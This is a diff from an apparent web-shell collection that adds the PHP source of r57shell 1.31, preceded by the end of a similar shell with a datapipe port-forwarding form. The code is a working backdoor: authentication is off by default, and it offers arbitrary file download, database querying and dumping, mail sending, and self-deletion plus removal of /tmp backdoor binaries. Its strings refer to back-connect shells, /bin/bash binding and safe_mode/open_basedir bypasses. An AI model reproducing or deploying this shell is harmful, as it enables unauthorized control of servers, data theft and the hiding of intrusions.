+echo "<div align=center><form name=datapipe method=POST>";
+echo $table_up1; echo $lang[$language.'_text22']; echo $table_up2;
+echo $font;
+echo "<b>".ws(2).$lang[$language.'_text23'].$arrow.ws(1)."</b>";
+echo "<input type=text name=local_port size=5 value=\"31337\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text24'].$arrow.ws(1)."</b>";
+echo "<input type=text name=remote_host size=15 value=\"irc.dalnet.ru\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text25'].$arrow.ws(1)."</b>";
+echo "<input type=text name=remote_port size=5 value=\"6667\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text26'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">datapipe.pl</option>";
+echo "<option value=\"C\">datapipe.c</option>";
+echo "</select>&nbsp;";
+echo ws(2)."<input type=submit name=submit value=\" ".$lang[$language.'_butt5']." \">";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "</font>";
+echo $table_end1;
+echo "</form></div>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/// end table
+echo "</table>";
+/* (c) */
+echo $table_up3;
+echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version ".$version." ]---o</b></font></div>";
+echo "</td></tr></table>$f";
+
+/* -------------------------[ EOF ]------------------------- */
+?>
diff --git a/xakep-shells/PHP/r57.php.php.txt b/xakep-shells/PHP/r57.php.php.txt
new file mode 100644
index 0000000..55bebd5
--- /dev/null
+++ b/xakep-shells/PHP/r57.php.php.txt
@@ -0,0 +1,2206 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #                             
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/*  ??????: 1.31
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? rst@void.ru. ??? ??????????? ????? ???????????. 
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ????????? | Options  ~~~ */
+
+// ????? ????? | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - ?????????????? ????????  ( authentification = On  )
+// $auth = 0; - ?????????????? ????????? ( authentification = Off )
+$auth = 0; 
+
+// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
+// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'
+// Login & password crypted with md5, default is 'r57'
+$name='ec371748dc2da624b35a4f8f685dd122'; // ????? ????????????  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? (user password)
+/******************************************************************************************************/
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  } 
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}   
+$head = '<!-- ??????????, ???? -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+.table1 {
+BORDER: 0px;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+.td1 {
+BORDER: 0px;
+font: 7pt Verdana;
+color: #000000;
+}
+.tr1 {
+BORDER: 0px;
+color: #000000;
+}
+table {
+BORDER:  #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+color: #000000;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+color: #000000;
+}
+BODY {
+margin: 1px;
+color: #000000;
+background-color: #e4e0d8;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     	$filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     	$mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";	
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';	
+ var $base = '';	
+ var $db   = '';	
+ var $connection;
+ var $res;        
+ var $error;      
+ var $rows;       
+ var $columns;     
+ var $num_rows;   
+ var $num_fields; 
+ var $dump;       
+ 
+ function connect()
+  {	   
+  	switch($this->db)
+     {
+  	 case 'MySQL': 	
+  	  if(empty($this->port)) { $this->port = '3306'; }
+  	  if(!function_exists('mysql_connect')) return 0;
+  	  $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);	
+  	  if(is_resource($this->connection)) return 1;
+  	 break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+  	  if(!function_exists('mssql_connect')) return 0;
+  	  $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);	
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;   
+  }
+  
+ function select_db()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 if(@mysql_select_db($this->base,$this->connection)) return 1;	
+    break;
+    case 'MSSQL':
+  	 if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;  
+  }
+  
+ function query($query)
+  { 
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  	case 'MySQL': 	
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
+      { 
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  	break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection))) 
+      {
+      $this->error = 'Query error';
+      return 0;	
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;     
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2; 
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';	
+      }
+     else 
+      { 
+      if(@ociexecute($this->res)) 
+       {	
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;	
+       }
+      $error = @ocierror();
+      $this->error=$error['message']; 
+      }
+    break;
+    }	
+  return 0;
+  }
+ function get_result()
+  { 
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;	
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->num_rows=@mysql_num_rows($this->res);
+  	 $this->num_fields=@mysql_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); 
+  	 @mysql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+  	 $this->num_rows=@mssql_num_rows($this->res);
+  	 $this->num_fields=@mssql_num_fields($this->res);    
+  	 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+  	 @mssql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+  	 $this->num_rows=@pg_num_rows($this->res); 
+  	 $this->num_fields=@pg_num_fields($this->res);   
+  	 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+  	 @pg_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0; 	
+  }
+ function dump($table)
+  { 
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->dump[0] = '## MySQL dump';
+  	 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+  	 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}	
+  	  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} 	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  } 	
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction'; 
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1; 	
+  }
+ function close()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL': 
+  	 @mysql_close($this->connection); 	
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }	
+  }
+ function affected_rows()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 return @mysql_affected_rows($this->res); 	
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }	
+  }
+ } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }		
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];	
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#e4e0d8>';
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else 
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";	
+   else
+    {
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5)
+      {	
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;	
+       case '1': 
+       if($sql->get_result())
+        {
+       	echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       	$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>"; 
+        }
+       break;	
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); 
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;	 	
+       }	
+      }
+     }
+    }
+   }   
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }	
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
